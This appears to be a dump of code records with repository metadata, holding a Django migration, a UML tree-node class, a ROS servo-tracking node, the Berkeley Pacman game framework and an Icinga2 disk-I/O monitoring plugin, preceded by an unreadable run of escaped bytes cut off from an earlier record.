\x5d\xc4\x51\xd0\xab\x26\x7b\x99\x20\xe3\x57\x57\xf0\x09\x1f\x01\x1c\x7d\xdd\x68\x56\x9b\x75\x26\x08\x2f\xd5\xe9\xf1\x93\xde\x0c\x4f\x73\x4a\x10\x08\xe4\x32\xc1\xa6\xb4\x36\x82\x4f\x27\xd0\x89\x8a\x96\xb1\x17\x6c\x67\x44\x45\x1a\xa1\x87\x2f\xbf\x85\xc3\x63\x50\x73\xc8\xe5\x8d\x87\x95\x6d\xec\xb0\x46\x83\x32\x87\xa8\x71\x1d\xb1\x87\x61\x65\x25\x6f\xf1\x2d\x22\xe1\x14\x16\x30\x61\x01\x52\x39\x08\xd1\xa2\x7b\xe0\x96\x57\xc0\x45\x16\x25\x48\x89\xdf\x53\x29\x80\xa3\xf0\xb7\x8e\x04\xe5\xd5\xdc\xc8\xca\x51\x11\x5f\xd5\x96\x68\x09\x60\xf3\xbd\x33\x31\x6a\xd1\x9e\xc3\x5b\x17\xac\x86\xef\xc3\xd3\x09\xa8\x20\xc3\xa2\x38\x3c\xb9\x7a\xe1\xa5\xd3\xee\x9d\x40\x37\xbd\x45\x1d\x4d\x0d\xc8\x80\xd4\x37\x81\x73\x3a\xe5\xf1\xcf\x4f\x7f\x1c\xa2\x2c\xaa\xc6\x13\xa2\x74\x79\x72\x2d\x5e\x1e\x57\x00\x7d\x9f\x44\x26\x65\x20\x62\xe0\x76\x9f\xc4\x27\x6b\x1d\x67\x5b\xe8\x30\xc5', 1) | [
"[email protected]"
] | |
d128117ff4ab9ee0203e6020aad91757346b332e | 90201c3debb9c6b8847899356f8ab02977089183 | /sistema_transporte/app_transporte/migrations/0002_auto_20200325_1338.py | 025332cfda9aa87a4095f65cca236dd17f5f0f17 | [] | no_license | Articfire/transporte-ddssc | 90bdca1d3dbb93646aae06711653379040ce50e8 | 2a8ca39a8c5bb38932af83ba1ae9996327824242 | refs/heads/master | 2022-12-13T01:15:04.276293 | 2021-12-12T22:41:11 | 2021-12-12T22:41:11 | 248,825,047 | 2 | 0 | null | 2022-12-08T03:53:23 | 2020-03-20T18:24:39 | Python | UTF-8 | Python | false | false | 695 | py | # Generated by Django 3.0.4 on 2020-03-25 20:38
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app_transporte', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Agenda',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.AlterField(
model_name='vehiculos',
name='estado',
            field=models.IntegerField(choices=[(0, 'Available'), (1, 'In maintenance'), (2, 'In transport')], default=0),  # max_length is not a valid option for IntegerField
),
]
| [
"[email protected]"
] | |
22d1ca1354a720021e9a3bf6df46c8e4bb6dcbf7 | b01543933aa10e1db83c0273514aa36ff5c90bf4 | /lib/Projekt/ProjectNode.py | 258ae64164569462b92171ef4318c97ef9b8a25c | [] | no_license | umlfri-old/umlfri-historic | 96a5b9dda5a2bbc86969b0cae13daffa6af330b0 | 770e0a28eb2b88d2502f31935efa00c6943793ff | refs/heads/master | 2021-01-20T04:09:52.158277 | 2017-08-25T07:38:48 | 2017-08-25T07:54:23 | 101,382,312 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,673 | py | from lib.lib import UMLException
class CProjectNode(object):
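    """
    A node of the project tree. Each node wraps an element (self.type),
    and keeps a reference to its parent, the list of its child nodes and
    the drawing areas attached to it.
    """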
def __init__(self, parent = None, type = None):
self.parent = parent
self.childs = []
self.drawingareas = []
self.type = type
def GetType(self):
return self.type
def GetName(self):
return self.type.GetName()
def AddChild(self, child):
if child not in self.childs:
self.childs.append(child)
child.parent = self
else:
raise UMLException("ExistsChild")
def AddDrawingArea(self, area):
if area not in self.drawingareas:
self.drawingareas.append(area)
else:
raise UMLException("ExistsArea")
def GetChild(self, name):
        for i in self.childs:
if i.GetName() == name:
return i
else:
return None
def GetIndexChild(self, index):
if index <= len(self.childs) - 1:
return self.childs[index]
else:
raise UMLException("NodeNotExists")
def GetChilds(self):
return self.childs
def GetParent(self):
return self.parent
def RemoveChild(self, child):
if child in self.childs:
self.childs.remove(child)
else:
raise UMLException("ChildNotExists")
def RemoveDrawingArea(self, area):
if area in self.drawingareas:
self.drawingareas.remove(area)
else:
raise UMLException("AreaNotExists")
def SetParent(self, parent):
self.parent = parent
    Parent = property(GetParent, SetParent)
| [
"[email protected]"
] | |
5f55cb53d30035dd743474f3a12cc8ea75207184 | fef45946632c023af452155b2c21f07774e65d55 | /node2.py | 27233a1ea5a2be171ef2249f0271556318316899 | [] | no_license | rikkimelissa/hackathon-1 | 975ea4069d288827de0eab951d08c6fbfa9a4f26 | c6401aa2dcdee45ef17c633031b74584a58bcc13 | refs/heads/master | 2021-01-17T08:43:02.717634 | 2015-09-18T21:39:54 | 2015-09-18T21:39:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,789 | py | #!/usr/bin/env python
import rospy
import roslib
from std_msgs.msg import String
import sys
import cv2
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
import serial
from std_msgs.msg import UInt16
pantarget = 1500
tilttarget = 1500
def node2cb(data, extra_args):
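    """Callback for the tracked pixel coordinate: nudges the pan ('x') or
    tilt ('y') target toward it and writes both targets to the servo
    controller. extra_args is (serial_port, 'x' or 'y')."""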
    ser, var = extra_args
x = data.data
print x
global pantarget
global tilttarget
if var == 'x':
if x >= 340 and pantarget < 1950:
            # x beyond the dead zone (300-340 px): increase the pan target
pantarget += 10
elif x <= 300 and pantarget > 1050:
pantarget -= 10
if var == 'y':
if x >= 260 and tilttarget < 1950:
            # coordinate beyond the dead zone (220-260 px): decrease the tilt target
tilttarget -= 10
elif x <= 220 and tilttarget > 1050:
tilttarget += 10
#tiltpos = bytearray([132,0,x,x])
#panpos = bytearray([132,1,x,x])
#paninput = int(x)
#tiltinput = int(raw_input("enter tilt value> "))
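    # The four command bytes below are consistent with the Pololu Maestro
    # compact "set target" protocol (an assumption from the byte pattern):
    # 0x84 (132), channel number, then the target split into a low and a
    # high 7-bit byte. Targets are in quarter-microseconds, hence the
    # multiplication by 4.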
pancom = pantarget*4 & 0x7f
pancom2 = (pantarget*4 >> 7) & 0x7f
tiltcom = tilttarget*4 & 0x7f
    tiltcom2 = (tilttarget*4 >> 7) & 0x7f
#print pancom, pancom2
#print tiltcom, tiltcom2
panpos = bytearray([132,0,pancom,pancom2])
tiltpos = bytearray([132,1,tiltcom,tiltcom2])
ser.write(panpos)
ser.write(tiltpos)
def node2():
rospy.init_node('node2', anonymous=True)
ser = serial.Serial('/dev/ttyACM0')
initialpan = bytearray([132,1,112,46])
initialtilt = bytearray([132,0,112,46])
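    # 112 + (46 << 7) = 6000 quarter-microseconds = a 1500 us pulse,
    # i.e. both channels start at the servo center position.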
ser.write(initialpan)
ser.write(initialtilt)
rospy.Subscriber('node1pub', UInt16, node2cb,(ser,"x"))
rospy.Subscriber('node1pub2', UInt16, node2cb,(ser,"y"))
rospy.spin()
if __name__ == '__main__':
node2()
| [
"[email protected]"
] | |
730fc97a12a5abd0489bec6a397ddf28021d3d40 | 6737bcca9857b6a81bf11680cf7665635859e245 | /HW 7/multiagent/pacman.py | 4d1c4be7835e607fbd80159ead8c3f5c0508cd4f | [] | no_license | clive819/SCU-COEN-266 | 2b1ad4886ac4d54c8ae9c31a10836a61eddef911 | 65e5005631f640a3c1125f45a8b6125eeebbd2cc | refs/heads/master | 2023-01-22T01:05:12.166664 | 2020-11-22T21:18:47 | 2020-11-22T21:18:47 | 315,133,138 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,475 | py | # pacman.py
# ---------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# ([email protected]) and Dan Klein ([email protected]).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel ([email protected]).
"""
Pacman.py holds the logic for the classic pacman game along with the main
code to run a game. This file is divided into three sections:
(i) Your interface to the pacman world:
Pacman is a complex environment. You probably don't want to
read through all of the code we wrote to make the game runs
correctly. This section contains the parts of the code
that you will need to understand in order to complete the
project. There is also some code in game.py that you should
understand.
(ii) The hidden secrets of pacman:
This section contains all of the logic code that the pacman
environment uses to decide who can move where, who dies when
things collide, etc. You shouldn't need to read this section
of code, but you can if you want.
(iii) Framework to start a game:
The final section contains the code for reading the command
you use to set up the game, then starting up a new game, along with
linking in all the external parts (agent functions, graphics).
Check this section out to see all the options available to you.
To play your first game, type 'python pacman.py' from the command line.
The keys are 'a', 's', 'd', and 'w' to move (or arrow keys). Have fun!
"""
from game import GameStateData
from game import Game
from game import Directions
from game import Actions
from util import nearestPoint
from util import manhattanDistance
import util
import layout
import sys
import types
import time
import random
import os
###################################################
# YOUR INTERFACE TO THE PACMAN WORLD: A GameState #
###################################################
class GameState:
"""
A GameState specifies the full game state, including the food, capsules,
agent configurations and score changes.
GameStates are used by the Game object to capture the actual state of the game and
can be used by agents to reason about the game.
Much of the information in a GameState is stored in a GameStateData object. We
strongly suggest that you access that data via the accessor methods below rather
than referring to the GameStateData object directly.
Note that in classic Pacman, Pacman is always agent 0.
"""
####################################################
# Accessor methods: use these to access state data #
####################################################
# static variable keeps track of which states have had getLegalActions called
explored = set()
def getAndResetExplored():
tmp = GameState.explored.copy()
GameState.explored = set()
return tmp
getAndResetExplored = staticmethod(getAndResetExplored)
def getLegalActions(self, agentIndex=0):
"""
Returns the legal actions for the agent specified.
"""
# GameState.explored.add(self)
if self.isWin() or self.isLose():
return []
if agentIndex == 0: # Pacman is moving
return PacmanRules.getLegalActions(self)
else:
return GhostRules.getLegalActions(self, agentIndex)
def generateSuccessor(self, agentIndex, action):
"""
Returns the successor state after the specified agent takes the action.
"""
# Check that successors exist
if self.isWin() or self.isLose():
raise Exception('Can\'t generate a successor of a terminal state.')
# Copy current state
state = GameState(self)
# Let agent's logic deal with its action's effects on the board
if agentIndex == 0: # Pacman is moving
state.data._eaten = [False for i in range(state.getNumAgents())]
PacmanRules.applyAction(state, action)
else: # A ghost is moving
GhostRules.applyAction(state, action, agentIndex)
# Time passes
if agentIndex == 0:
state.data.scoreChange += -TIME_PENALTY # Penalty for waiting around
else:
GhostRules.decrementTimer(state.data.agentStates[agentIndex])
# Resolve multi-agent effects
GhostRules.checkDeath(state, agentIndex)
# Book keeping
state.data._agentMoved = agentIndex
state.data.score += state.data.scoreChange
GameState.explored.add(self)
GameState.explored.add(state)
return state
def getLegalPacmanActions(self):
return self.getLegalActions(0)
def generatePacmanSuccessor(self, action):
"""
Generates the successor state after the specified pacman move
"""
return self.generateSuccessor(0, action)
def getPacmanState(self):
"""
Returns an AgentState object for pacman (in game.py)
state.pos gives the current position
state.direction gives the travel vector
"""
return self.data.agentStates[0].copy()
def getPacmanPosition(self):
return self.data.agentStates[0].getPosition()
def getGhostStates(self):
return self.data.agentStates[1:]
def getGhostState(self, agentIndex):
if agentIndex == 0 or agentIndex >= self.getNumAgents():
raise Exception("Invalid index passed to getGhostState")
return self.data.agentStates[agentIndex]
def getGhostPosition(self, agentIndex):
if agentIndex == 0:
raise Exception("Pacman's index passed to getGhostPosition")
return self.data.agentStates[agentIndex].getPosition()
def getGhostPositions(self):
return [s.getPosition() for s in self.getGhostStates()]
def getNumAgents(self):
return len(self.data.agentStates)
def getScore(self):
return float(self.data.score)
def getCapsules(self):
"""
Returns a list of positions (x,y) of the remaining capsules.
"""
return self.data.capsules
def getNumFood(self):
return self.data.food.count()
def getFood(self):
"""
Returns a Grid of boolean food indicator variables.
Grids can be accessed via list notation, so to check
if there is food at (x,y), just call
currentFood = state.getFood()
if currentFood[x][y] == True: ...
"""
return self.data.food
def getWalls(self):
"""
Returns a Grid of boolean wall indicator variables.
Grids can be accessed via list notation, so to check
if there is a wall at (x,y), just call
walls = state.getWalls()
if walls[x][y] == True: ...
"""
return self.data.layout.walls
def hasFood(self, x, y):
return self.data.food[x][y]
def hasWall(self, x, y):
return self.data.layout.walls[x][y]
def isLose(self):
return self.data._lose
def isWin(self):
return self.data._win
#############################################
# Helper methods: #
# You shouldn't need to call these directly #
#############################################
def __init__(self, prevState=None):
"""
Generates a new state by copying information from its predecessor.
"""
        if prevState != None: # Copy information from the predecessor state
self.data = GameStateData(prevState.data)
else:
self.data = GameStateData()
def deepCopy(self):
state = GameState(self)
state.data = self.data.deepCopy()
return state
def __eq__(self, other):
"""
Allows two states to be compared.
"""
return hasattr(other, 'data') and self.data == other.data
def __hash__(self):
"""
Allows states to be keys of dictionaries.
"""
return hash(self.data)
def __str__(self):
return str(self.data)
def initialize(self, layout, numGhostAgents=1000):
"""
Creates an initial game state from a layout array (see layout.py).
"""
self.data.initialize(layout, numGhostAgents)
############################################################################
# THE HIDDEN SECRETS OF PACMAN #
# #
# You shouldn't need to look through the code in this section of the file. #
############################################################################
SCARED_TIME = 40 # Moves ghosts are scared
COLLISION_TOLERANCE = 0.7 # How close ghosts must be to Pacman to kill
TIME_PENALTY = 1 # Number of points lost each round
class ClassicGameRules:
"""
These game rules manage the control flow of a game, deciding when
and how the game starts and ends.
"""
def __init__(self, timeout=30):
self.timeout = timeout
def newGame(self, layout, pacmanAgent, ghostAgents, display, quiet=False, catchExceptions=False):
agents = [pacmanAgent] + ghostAgents[:layout.getNumGhosts()]
initState = GameState()
initState.initialize(layout, len(ghostAgents))
game = Game(agents, display, self, catchExceptions=catchExceptions)
game.state = initState
self.initialState = initState.deepCopy()
self.quiet = quiet
return game
def process(self, state, game):
"""
Checks to see whether it is time to end the game.
"""
if state.isWin():
self.win(state, game)
if state.isLose():
self.lose(state, game)
def win(self, state, game):
if not self.quiet:
print("Pacman emerges victorious! Score: %d" % state.data.score)
game.gameOver = True
def lose(self, state, game):
if not self.quiet:
print("Pacman died! Score: %d" % state.data.score)
game.gameOver = True
def getProgress(self, game):
return float(game.state.getNumFood()) / self.initialState.getNumFood()
def agentCrash(self, game, agentIndex):
if agentIndex == 0:
print("Pacman crashed")
else:
print("A ghost crashed")
def getMaxTotalTime(self, agentIndex):
return self.timeout
def getMaxStartupTime(self, agentIndex):
return self.timeout
def getMoveWarningTime(self, agentIndex):
return self.timeout
def getMoveTimeout(self, agentIndex):
return self.timeout
def getMaxTimeWarnings(self, agentIndex):
return 0
class PacmanRules:
"""
These functions govern how pacman interacts with his environment under
the classic game rules.
"""
PACMAN_SPEED = 1
def getLegalActions(state):
"""
Returns a list of possible actions.
"""
return Actions.getPossibleActions(state.getPacmanState().configuration, state.data.layout.walls)
getLegalActions = staticmethod(getLegalActions)
def applyAction(state, action):
"""
Edits the state to reflect the results of the action.
"""
legal = PacmanRules.getLegalActions(state)
if action not in legal:
raise Exception("Illegal action " + str(action))
pacmanState = state.data.agentStates[0]
# Update Configuration
vector = Actions.directionToVector(action, PacmanRules.PACMAN_SPEED)
pacmanState.configuration = pacmanState.configuration.generateSuccessor(
vector)
# Eat
next = pacmanState.configuration.getPosition()
nearest = nearestPoint(next)
if manhattanDistance(nearest, next) <= 0.5:
# Remove food
PacmanRules.consume(nearest, state)
applyAction = staticmethod(applyAction)
def consume(position, state):
x, y = position
# Eat food
if state.data.food[x][y]:
state.data.scoreChange += 10
state.data.food = state.data.food.copy()
state.data.food[x][y] = False
state.data._foodEaten = position
# TODO: cache numFood?
numFood = state.getNumFood()
if numFood == 0 and not state.data._lose:
state.data.scoreChange += 500
state.data._win = True
# Eat capsule
if(position in state.getCapsules()):
state.data.capsules.remove(position)
state.data._capsuleEaten = position
# Reset all ghosts' scared timers
for index in range(1, len(state.data.agentStates)):
state.data.agentStates[index].scaredTimer = SCARED_TIME
consume = staticmethod(consume)
class GhostRules:
"""
These functions dictate how ghosts interact with their environment.
"""
GHOST_SPEED = 1.0
def getLegalActions(state, ghostIndex):
"""
Ghosts cannot stop, and cannot turn around unless they
reach a dead end, but can turn 90 degrees at intersections.
"""
conf = state.getGhostState(ghostIndex).configuration
possibleActions = Actions.getPossibleActions(
conf, state.data.layout.walls)
reverse = Actions.reverseDirection(conf.direction)
if Directions.STOP in possibleActions:
possibleActions.remove(Directions.STOP)
if reverse in possibleActions and len(possibleActions) > 1:
possibleActions.remove(reverse)
return possibleActions
getLegalActions = staticmethod(getLegalActions)
def applyAction(state, action, ghostIndex):
legal = GhostRules.getLegalActions(state, ghostIndex)
if action not in legal:
raise Exception("Illegal ghost action " + str(action))
ghostState = state.data.agentStates[ghostIndex]
speed = GhostRules.GHOST_SPEED
if ghostState.scaredTimer > 0:
speed /= 2.0
vector = Actions.directionToVector(action, speed)
ghostState.configuration = ghostState.configuration.generateSuccessor(
vector)
applyAction = staticmethod(applyAction)
def decrementTimer(ghostState):
timer = ghostState.scaredTimer
if timer == 1:
ghostState.configuration.pos = nearestPoint(
ghostState.configuration.pos)
ghostState.scaredTimer = max(0, timer - 1)
decrementTimer = staticmethod(decrementTimer)
def checkDeath(state, agentIndex):
pacmanPosition = state.getPacmanPosition()
if agentIndex == 0: # Pacman just moved; Anyone can kill him
for index in range(1, len(state.data.agentStates)):
ghostState = state.data.agentStates[index]
ghostPosition = ghostState.configuration.getPosition()
if GhostRules.canKill(pacmanPosition, ghostPosition):
GhostRules.collide(state, ghostState, index)
else:
ghostState = state.data.agentStates[agentIndex]
ghostPosition = ghostState.configuration.getPosition()
if GhostRules.canKill(pacmanPosition, ghostPosition):
GhostRules.collide(state, ghostState, agentIndex)
checkDeath = staticmethod(checkDeath)
def collide(state, ghostState, agentIndex):
if ghostState.scaredTimer > 0:
state.data.scoreChange += 200
GhostRules.placeGhost(state, ghostState)
ghostState.scaredTimer = 0
# Added for first-person
state.data._eaten[agentIndex] = True
else:
if not state.data._win:
state.data.scoreChange -= 500
state.data._lose = True
collide = staticmethod(collide)
def canKill(pacmanPosition, ghostPosition):
return manhattanDistance(ghostPosition, pacmanPosition) <= COLLISION_TOLERANCE
canKill = staticmethod(canKill)
def placeGhost(state, ghostState):
ghostState.configuration = ghostState.start
placeGhost = staticmethod(placeGhost)
#############################
# FRAMEWORK TO START A GAME #
#############################
def default(str):
return str + ' [Default: %default]'
def parseAgentArgs(str):
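    """
    Parses comma separated key=value pairs, e.g.
    'depth=3,evalFn' -> {'depth': '3', 'evalFn': 1}.
    """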
if str == None:
return {}
pieces = str.split(',')
opts = {}
for p in pieces:
if '=' in p:
key, val = p.split('=')
else:
key, val = p, 1
opts[key] = val
return opts
def readCommand(argv):
"""
Processes the command used to run pacman from the command line.
"""
from optparse import OptionParser
usageStr = """
USAGE: python pacman.py <options>
EXAMPLES: (1) python pacman.py
- starts an interactive game
(2) python pacman.py --layout smallClassic --zoom 2
OR python pacman.py -l smallClassic -z 2
- starts an interactive game on a smaller board, zoomed in
"""
parser = OptionParser(usageStr)
parser.add_option('-n', '--numGames', dest='numGames', type='int',
help=default('the number of GAMES to play'), metavar='GAMES', default=1)
parser.add_option('-l', '--layout', dest='layout',
help=default(
'the LAYOUT_FILE from which to load the map layout'),
metavar='LAYOUT_FILE', default='mediumClassic')
parser.add_option('-p', '--pacman', dest='pacman',
help=default(
'the agent TYPE in the pacmanAgents module to use'),
metavar='TYPE', default='KeyboardAgent')
parser.add_option('-t', '--textGraphics', action='store_true', dest='textGraphics',
help='Display output as text only', default=False)
parser.add_option('-q', '--quietTextGraphics', action='store_true', dest='quietGraphics',
help='Generate minimal output and no graphics', default=False)
parser.add_option('-g', '--ghosts', dest='ghost',
help=default(
'the ghost agent TYPE in the ghostAgents module to use'),
metavar='TYPE', default='RandomGhost')
parser.add_option('-k', '--numghosts', type='int', dest='numGhosts',
help=default('The maximum number of ghosts to use'), default=4)
parser.add_option('-z', '--zoom', type='float', dest='zoom',
help=default('Zoom the size of the graphics window'), default=1.0)
parser.add_option('-f', '--fixRandomSeed', action='store_true', dest='fixRandomSeed',
help='Fixes the random seed to always play the same game', default=False)
parser.add_option('-r', '--recordActions', action='store_true', dest='record',
help='Writes game histories to a file (named by the time they were played)', default=False)
parser.add_option('--replay', dest='gameToReplay',
help='A recorded game file (pickle) to replay', default=None)
parser.add_option('-a', '--agentArgs', dest='agentArgs',
help='Comma separated values sent to agent. e.g. "opt1=val1,opt2,opt3=val3"')
parser.add_option('-x', '--numTraining', dest='numTraining', type='int',
help=default('How many episodes are training (suppresses output)'), default=0)
parser.add_option('--frameTime', dest='frameTime', type='float',
help=default('Time to delay between frames; <0 means keyboard'), default=0.1)
parser.add_option('-c', '--catchExceptions', action='store_true', dest='catchExceptions',
help='Turns on exception handling and timeouts during games', default=False)
parser.add_option('--timeout', dest='timeout', type='int',
help=default('Maximum length of time an agent can spend computing in a single game'), default=30)
options, otherjunk = parser.parse_args(argv)
if len(otherjunk) != 0:
raise Exception('Command line input not understood: ' + str(otherjunk))
args = dict()
# Fix the random seed
if options.fixRandomSeed:
random.seed('cs188')
# Choose a layout
args['layout'] = layout.getLayout(options.layout)
if args['layout'] == None:
raise Exception("The layout " + options.layout + " cannot be found")
# Choose a Pacman agent
noKeyboard = options.gameToReplay == None and (
options.textGraphics or options.quietGraphics)
pacmanType = loadAgent(options.pacman, noKeyboard)
agentOpts = parseAgentArgs(options.agentArgs)
if options.numTraining > 0:
args['numTraining'] = options.numTraining
if 'numTraining' not in agentOpts:
agentOpts['numTraining'] = options.numTraining
pacman = pacmanType(**agentOpts) # Instantiate Pacman with agentArgs
args['pacman'] = pacman
# Don't display training games
if 'numTrain' in agentOpts:
options.numQuiet = int(agentOpts['numTrain'])
options.numIgnore = int(agentOpts['numTrain'])
# Choose a ghost agent
ghostType = loadAgent(options.ghost, noKeyboard)
args['ghosts'] = [ghostType(i+1) for i in range(options.numGhosts)]
# Choose a display format
if options.quietGraphics:
import textDisplay
args['display'] = textDisplay.NullGraphics()
elif options.textGraphics:
import textDisplay
textDisplay.SLEEP_TIME = options.frameTime
args['display'] = textDisplay.PacmanGraphics()
else:
import graphicsDisplay
args['display'] = graphicsDisplay.PacmanGraphics(
options.zoom, frameTime=options.frameTime)
args['numGames'] = options.numGames
args['record'] = options.record
args['catchExceptions'] = options.catchExceptions
args['timeout'] = options.timeout
# Special case: recorded games don't use the runGames method or args structure
if options.gameToReplay != None:
print('Replaying recorded game %s.' % options.gameToReplay)
import pickle
f = open(options.gameToReplay, 'rb')
try:
recorded = pickle.load(f)
finally:
f.close()
recorded['display'] = args['display']
replayGame(**recorded)
sys.exit(0)
return args
def loadAgent(pacman, nographics):
# Looks through all pythonPath Directories for the right module,
pythonPathStr = os.path.expandvars("$PYTHONPATH")
if pythonPathStr.find(';') == -1:
pythonPathDirs = pythonPathStr.split(':')
else:
pythonPathDirs = pythonPathStr.split(';')
pythonPathDirs.append('.')
for moduleDir in pythonPathDirs:
if not os.path.isdir(moduleDir):
continue
moduleNames = [f for f in os.listdir(
moduleDir) if f.endswith('gents.py')]
for modulename in moduleNames:
try:
module = __import__(modulename[:-3])
except ImportError:
continue
if pacman in dir(module):
if nographics and modulename == 'keyboardAgents.py':
raise Exception(
'Using the keyboard requires graphics (not text display)')
return getattr(module, pacman)
raise Exception('The agent ' + pacman +
' is not specified in any *Agents.py.')
def replayGame(layout, actions, display):
import pacmanAgents
import ghostAgents
rules = ClassicGameRules()
agents = [pacmanAgents.GreedyAgent()] + [ghostAgents.RandomGhost(i+1)
for i in range(layout.getNumGhosts())]
game = rules.newGame(layout, agents[0], agents[1:], display)
state = game.state
display.initialize(state.data)
for action in actions:
# Execute the action
state = state.generateSuccessor(*action)
# Change the display
display.update(state.data)
# Allow for game specific conditions (winning, losing, etc.)
rules.process(state, game)
display.finish()
def runGames(layout, pacman, ghosts, display, numGames, record, numTraining=0, catchExceptions=False, timeout=30):
import __main__
__main__.__dict__['_display'] = display
rules = ClassicGameRules(timeout)
games = []
for i in range(numGames):
beQuiet = i < numTraining
if beQuiet:
# Suppress output and graphics
import textDisplay
gameDisplay = textDisplay.NullGraphics()
rules.quiet = True
else:
gameDisplay = display
rules.quiet = False
game = rules.newGame(layout, pacman, ghosts,
gameDisplay, beQuiet, catchExceptions)
game.run()
if not beQuiet:
games.append(game)
if record:
import time
import pickle
fname = ('recorded-game-%d' % (i + 1)) + \
'-'.join([str(t) for t in time.localtime()[1:6]])
f = open(fname, 'wb')
components = {'layout': layout, 'actions': game.moveHistory}
pickle.dump(components, f)
f.close()
if (numGames-numTraining) > 0:
scores = [game.state.getScore() for game in games]
wins = [game.state.isWin() for game in games]
winRate = wins.count(True) / float(len(wins))
print('Average Score:', sum(scores) / float(len(scores)))
print('Scores: ', ', '.join([str(score) for score in scores]))
print('Win Rate: %d/%d (%.2f)' %
(wins.count(True), len(wins), winRate))
print('Record: ', ', '.join(
[['Loss', 'Win'][int(w)] for w in wins]))
return games
if __name__ == '__main__':
"""
The main function called when pacman.py is run
from the command line:
> python pacman.py
See the usage string for more details.
> python pacman.py --help
"""
args = readCommand(sys.argv[1:]) # Get game components based on input
runGames(**args)
# import cProfile
# cProfile.run("runGames( **args )")
pass
| [
"[email protected]"
] | |
de57f86650cdd9a45c6f228f4187c4bd3a9c8820 | 092b656a7faefe6e9c7a8c91217ce4ee85f70fd9 | /sondes/check_disk_io.py | e6fdd261da650023310bb1ec8bbe663459faf567 | [] | no_license | aurimukas/icinga2_plugins | 39ca3d848fe24fd278b4b6adc1f26f0e341ca5d2 | fc8c808c46f65696f7c6ac8fd6266c1091dbb14d | refs/heads/master | 2021-01-18T21:44:14.442257 | 2016-11-18T10:40:35 | 2016-11-18T10:40:35 | 72,296,781 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,833 | py | #!/opt/venv/bin/python
# -*- coding: utf-8 -*-
""" Icinga2 Plugin: Check Disk I/O
Method to Monitor Machine's Disk I/O
File name: check_disk_io.py
Author: Aurimas NAVICKAS
Date created: 03/11/2016
Python Version: 3.5.2
"""
import importlib
time = importlib.import_module('time')
rm = importlib.import_module('.request_manager', 'argoss_libs.snmp')
pd_class = importlib.import_module('.perfdata', 'argoss_libs.snmp')
PerfDataItem = pd_class.PerfDataItem
nagios = importlib.import_module('nagiosplugin')
logging = importlib.import_module('logging')
_log = logging.getLogger('nagiosplugin')
__author__ = "Aurimas NAVICKAS"
class CheckDiskIo(rm.RequestManager):
"""
Check Machine's Disk I/O Metrics Method
Extra parameters to pass:
:param --disk, -d: Disk name. Required
Static Parameters:
    :param COMPARISON_TTL: time in seconds for which the comparison data is kept in the Redis cache.
"""
COMPARISON_TTL = 180
def __init__(self, params, *args, **kwargs):
"""
Class initialization.
:param params: Args list to pass to argsParser.
:param args: Extra Args
:param kwargs: Extra kwargs
"""
# Getting default args defined in RequestManager Class
argsp = self.default_args("Check Disk IO")
# Extra args definition
argsp.add_argument('--disk', '-d', required=True, type=str, help='Disk name')
# Parsing passed params with argsParser
self.pargs = argsp.parse_args(params)
# Redis key to store machine's disk IO comparison data
self.io_key = '{0.host}:check_disk_io:{0.disk}'.format(self.pargs)
# Indexes primary definition
indexes = {
'oids': ['.1.3.6.1.4.1.2021.13.15.1.1.2'],
'values': {}
}
# Setting current timestamp
timestamp = time.time()
# Perfdata definition
perfdata = [
# Time delta from Now and time cached in Redis of last check.
PerfDataItem(key='delta', return_value=False, value_type='%f', value=timestamp, priority=0,
calculation="delta-delta_cache"),
PerfDataItem(key='alert_ioread', oid='.1.3.6.1.4.1.2021.13.15.1.1.5', return_value=True, value_type='%f',
calculation="(alert_ioread-alert_ioread_cache)/delta", priority=0),
PerfDataItem(key='alert_iowrite', oid='.1.3.6.1.4.1.2021.13.15.1.1.6', return_value=True, value_type='%f',
calculation="(alert_iowrite-alert_iowrite_cache)/delta", priority=0),
]
# Setting PerfDataItems index_label to passed disk name
indexes['values'][self.pargs.disk] = None
for pd in perfdata:
if pd.return_value:
pd.index_label = self.pargs.disk
# Init a Super Class
super(CheckDiskIo, self).__init__(self.pargs.host, self.pargs.port, self.pargs.community, self.pargs.version,
indexes=indexes, perfdata=perfdata, *args, **kwargs)
def probe(self):
"""Query system state and return metrics.
This is the only method called by the check controller.
It should trigger all necessary actions and create metrics.
:return: list of :class:`~nagiosplugin.metric.Metric` objects,
or generator that emits :class:`~nagiosplugin.metric.Metric`
objects, or single :class:`~nagiosplugin.metric.Metric`
object
"""
# Updating Perfdata and indexes
try:
self.update_performance_data(force_update_perfdata_from_host=True)
except Exception as e:
raise nagios.CheckError("Memory Check Error. %s", e)
# Preparing perfdata data to cache for future runs
perfdata_to_cache = self.prepare_cache_perfdata(self.perfdata)
# Checking if we have a cached data from previous run
exists, contains = self.cache.check_if_exists_and_contains(self.io_key, value_type='val')
if exists:
# Getting cached data from Redis
c_perfdata = self.cache.get_pickled_dict(self.io_key)
if isinstance(c_perfdata, list) and len(c_perfdata):
# Applying cache data to perfdata
self.apply_cached_perfdata(c_perfdata)
# Setting a new cache data for next run
self.cache.set_pickled_dict(self.io_key, perfdata_to_cache, expire=self.COMPARISON_TTL)
if not exists:
# No data in Cache. Nothing to compare. Exit
raise nagios.CheckError('No Data to compare with')
# _log.debug(self.perfdata)
# Evaluate calculations defined in Perfdata
self.eval_expressions()
# Generate Nagios Metrics list and return it
return self.yield_metrics()
| [
"[email protected]"
] | |
